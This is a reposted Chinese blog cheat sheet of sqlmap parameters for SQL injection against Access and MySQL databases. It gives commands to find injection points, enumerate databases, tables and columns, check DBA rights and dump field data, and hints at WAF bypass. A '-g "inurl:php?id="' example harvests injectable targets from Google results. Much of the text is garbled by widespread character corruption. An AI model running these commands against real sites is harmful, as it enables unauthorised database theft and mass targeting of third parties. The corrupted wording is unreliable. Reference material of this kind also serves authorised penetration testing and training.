SqlMap常用参数(一)
sqlmap可謂是利用sql注入的神器了,sqlmap的參數(shù)很多,接下介紹幾種常見的參數(shù)。
一。注入access數(shù)據(jù)庫常用的參數(shù)
sqlmap.py -u "url"? //判斷參數(shù)是否存在注入
sqlmap.py -u "url" --tables //猜解表名
sqlmap.py -u "url" --columns -T "要猜解的表名"? //猜解列名
sqlmap.py -u "url" --dump -C "列名" -T “表名”? //爆出字段數(shù)據(jù)
二。注入MySQL數(shù)據(jù)庫常用參數(shù)
sqlmap.py -u "url"? //判斷參數(shù)是否存在注入
sqlmap.py -u "url" --current-db? //查看網(wǎng)站當(dāng)前數(shù)據(jù)庫
sqlmap.py -u "url" --is-dba? //查看當(dāng)前用戶權(quán)限
sqlmap.py -u "url" --tables //猜解表名
sqlmap.py -u "url" --columns -T "要猜解的表名"? //猜解列名
sqlmap.py -u "url" --dump -C "列名" -T “表名”? //爆出字段數(shù)據(jù)
三。一些常用參數(shù)集合
-h //查看幫助選項(xiàng)
--dbs //查看網(wǎng)站所有數(shù)據(jù)庫
--users //查看所有數(shù)據(jù)庫的用戶
--count? //統(tǒng)計(jì)條數(shù) (該條命令可用在爆表名的時(shí)候,便于查看哪個(gè)是管理員的表)
--level //測試等級(1-5)默認(rèn)是1,cookie注入是2,http頭注入是3
--dbms=mysql/oracle/mssql 指定數(shù)據(jù)庫(這樣既可以節(jié)省時(shí)間,在某些時(shí)候也可以繞過waf)
? sqlmap.py -u “url”--batch --exclude-sysdbs //batch是使用sqlmap默認(rèn)選項(xiàng),不用按回車;exclude-sysdbs是排除系統(tǒng)自帶的數(shù)據(jù)庫
顯示調(diào)式信息 -v 顯示調(diào)用信息有7個(gè)級別 0, 只顯示python錯(cuò)誤以及嚴(yán)重的信息 1,同時(shí)顯示基本信息和警告信息。 2,同時(shí)顯示debug信息 3,同時(shí)顯示注入的payload 4,同時(shí)顯示http請求 5,同時(shí)顯示http響應(yīng)頭 6,同時(shí)顯示http響應(yīng)頁面--risk ?? //風(fēng)險(xiǎn)等級,共有四個(gè)等級,1會測試大部分的測試語句,2會增加基于事件的測試語句,3會增加OR語句的sql注入測試 -m?????? //從文本中獲取多個(gè)目標(biāo),文件中保存url格式,sqlmap會一個(gè)一個(gè)測試? sqlmap.py -m 1.txt
-r??????? //獲取http請求注入,sqlmap可以從一個(gè)文本文件中獲取http請求,這樣就可以跳過設(shè)置一些其他參數(shù),在存在注入的http請求頭加*。 利用的場景:post,搜索注入,http頭注入,登陸后的注入(在登錄后存在注入點(diǎn),因?yàn)橹挥性诘卿浐蟛庞衏ookie) -g?????? //處理google搜索結(jié)果,sqlmap可以測試注入google的搜索結(jié)果中的get參數(shù)(前100個(gè)請求)?????? sqlmap.py -g "inurl:php?id="
轉(zhuǎn)載于:https://www.cnblogs.com/Da4er/p/10947177.html
總結(jié)
以上是生活随笔為你收集整理的SqlMap常用参数(一)的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 读取STM32单片机-ID操作
- 下一篇: JSON.parse使用 之 Unexp